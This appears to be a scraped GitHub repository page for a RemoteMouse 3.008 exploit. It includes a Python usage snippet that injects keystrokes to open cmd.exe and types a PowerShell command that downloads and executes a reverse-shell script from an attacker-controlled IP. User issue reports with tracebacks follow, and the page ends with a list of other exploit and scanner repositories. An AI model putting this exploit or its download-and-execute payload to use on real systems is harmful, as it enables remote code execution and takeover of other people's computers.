This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.

Last update: Dec 04, 2022

Overview

RemoteMouse-3.008-Exploit

The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.

Video Proof of Concept

poc.mp4

Usage

remotemouse = RemoteMouse(host=options.target_ip, verbose=options.verbose)

# Press Win + R
remotemouse._send_command(Keymap.KEY_WIN)

# Type cmd.exe
remotemouse.keyboard.press(Keymap.KEY_BACKSPACE)
remotemouse.keyboard.type("cmd.exe")
remotemouse.keyboard.press(Keymap.KEY_RETURN)

# Wait for cmd.exe to start
time.sleep(0.5)

# Payload
cmd = "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""

# Send payload char by char
remotemouse.keyboard.type(cmd)

# Press enter to execute payload
remotemouse.keyboard.press(Keymap.KEY_WIN)

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

References

https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/

Comments

unsupported operand type(s) Python 3.10.4

Hey,

I'm getting issues when running the exploit on Python 3.10.4. $ python3 Remote.py -v -t $IP

[cmd] Keymap.KEY_WIN
ERROR: a bytes-like object is required, not 'Keymap'
[cmd] key  3BASd
Traceback (most recent call last):
  File "/tmp/Remote.py", line 275, in <module>
    remotemouse.keyboard.type("cmd.exe")
  File "/tmp/Remote.py", line 171, in type
    self.press(character)
  File "/tmp/Remote.py", line 178, in press
    self.parent_remotemouse._send_command(self.charset[key] + "d")
TypeError: unsupported operand type(s) for +: 'Keymap' and 'str'

opened by Darktortue 1

the script is not running as expected
ISSUE

Using the provided RemoteMouse-3.008-Exploit.py AS-IS, will not work.

EXPECTED BEHAVIOR

I'm expecting the start menu to open and the cmd.exe to be written...

ACTUAL BEHAVIOR

Nothing opens or written

TROUBLESHOOTING

I've changed remotemouse._send_command(Keymap.KEY_WIN.value) to remotemouse.keyboard.press(Keymap.KEY_WIN)

now the start menu opens

I wanted to just test the typing functionality with remotemouse.keyboard.type("cmd.exe")

I opened a notepad with the cursor active on it, nothing happened.

ENVIRONMENT

source: Kali Linux

Python 3.9.12

target: Windows 10 (version 1709)
opened by bigoper 0
not sure why it's trying to enum a keymap
class Keymap(Enum):

File "./yeaboi.py", line 118, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.6/enum.py", line 92, in setitem raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'
opened by NAP3XD 0
Having issue when running the script

Hi P0dalirius,

This is an awsome exploit but i'm having some issues running it from my VM, are you able to advise as to why? I'm running ./remote -v -t $IP Traceback (most recent call last): File "/home**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 25, in <module> class Keymap(Enum): File "/home/**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 115, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.9/enum.py", line 133, in __setitem__ raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'

opened by reshfi 0
Running exploit in slower networks leads to "not-in-order" output

Thanks for your well written exploit code, but I have one issue with the execution of it in worse network conditions than a local network. A good addition would be to add a configurable sleep between the keystrokes to make this issue less common.

Otherwise it would look like this:

opened by 1989gironimo 0

Releases(1.0)

1.0(Dec 17, 2021)

Source code(tar.gz)
Source code(zip)

Owner

Podalirius

Hacker of everything

GitHub Repository https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/

Springboot directory scanning

87 Dec 28, 2022

This is a js front-end encryption blasting account and password tools

Author:0xAXSDD By Gamma安全实验室 version:1.0 explain:这是一款用户绕过前端js加密进行密码爆破的工具，你无需在意js加密的细节，只需要输入你想要爆破url，以及username输入框的classname，password输入框的clas

75 Nov 25, 2022

ONT Analysis Toolkit (OAT)

A toolkit for monitoring ONT MinION sequencing, followed by data analysis, for viral genomes amplified with tiled amplicon sequencing.

6 Jun 14, 2022

Python tool for dumping flash via uboot reliably

Reliable Uboot Flash Dumper is a Python tool for dumping flash via uboot reliably. If you've ever had to dump flash via uboot and a serial connection and became frustrated about doing it several time

25 May 10, 2022

exchange-ssrf-rce

Usage python3 .\exchange-exp.py -------------------------------------------------------------------------------- |

76 Nov 09, 2022

POC using subprocess lib in Python 🐍

POC subprocess ☞ POC using the subprocess library with Python. References: https://github.com/GuillaumeFalourd/poc-subprocess https://geekflare.com/le

2 Nov 28, 2022

Flutter Reverse Engineering Framework

This framework helps reverse engineer Flutter apps using patched version of Flutter library which is already compiled and ready for app repacking. There are changes made to snapshot deserialization p

910 Jan 01, 2023

ORector - A Fast Python tool designed to detect open redirects vulnerabilities on websites

ORector is a Fast Python tool designed to detect open redirects vulnerabilities

11 Apr 02, 2022

This project is all about building an amazing application that will help users manage their passwords and even generate new passwords for them

An amazing application that will help us manage our passwords and even generate new passwords for us.

1 Jan 23, 2022

Ensure secure infrastructure and consistency with the firewall rules

Python Port Scanner This script tries to check if it's possible to make a connection with the specific endpoint port. This is very useful to ensure se

7 Feb 26, 2022

Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

5 Nov 09, 2022

Yesitsme - Simple OSINT script to find Instagram profiles by name and e-mail/phone

Simple OSINT script to find Instagram profiles by name and e-mail/phone

108 Jan 07, 2023

Workshop Material on VM-based Deobfuscation

Analysis of Virtualization-based Obfuscation This repository contains slides, samples and code of the 4h code deobfuscation workshop at r2con2021. We

133 Dec 18, 2022

Shell hunter for AF

AF-ShellHunter AF-ShellHunter: Auto shell lookup AF-ShellHunter its a script designed to automate the search of WebShell's in AF Team How to pip3 ins

34 May 13, 2022

Simple tool to create passwords.

PasswordGenerator Simple password generator: -Simplisitc Window Application -Allows Numbers, Symbols & letters upper and lowercase -Restricts rows of

1 Jan 10, 2022

Cve-2021-22005-exp

cve-2021-22005-exp 0x01 漏洞简介 2021年9月21日，VMware发布安全公告，公开披露了vCenter Server中的19个安全漏洞，这些漏洞的CVSSv3评分范围为4.3-9.8。其中，最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-20

146 Dec 31, 2022

Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

17 Dec 11, 2022

CVE-2021-26084 Remote Code Execution on Confluence Servers

CVE-2021-26084 CVE-2021-26084 Remote Code Execution on Confluence Servers. Dork Fofa: app="ATLASSIAN-Confluence" Usage Show help information. python P

63 Dec 30, 2022

A simple way to store your passwords without requiring third party applications

SimplePasswordManager A simple way to store your passwords without requiring third party applications Simple To Use. Store Your Passwords For Each Web

1 Dec 23, 2021

nuclei scanner for proxyshell ( CVE-2021-34473 )

Proxyshell-Scanner nuclei scanner for Proxyshell RCE (CVE-2021-34423,CVE-2021-34473,CVE-2021-31207) discovered by orange tsai in Pwn2Own, which affect

29 Dec 16, 2022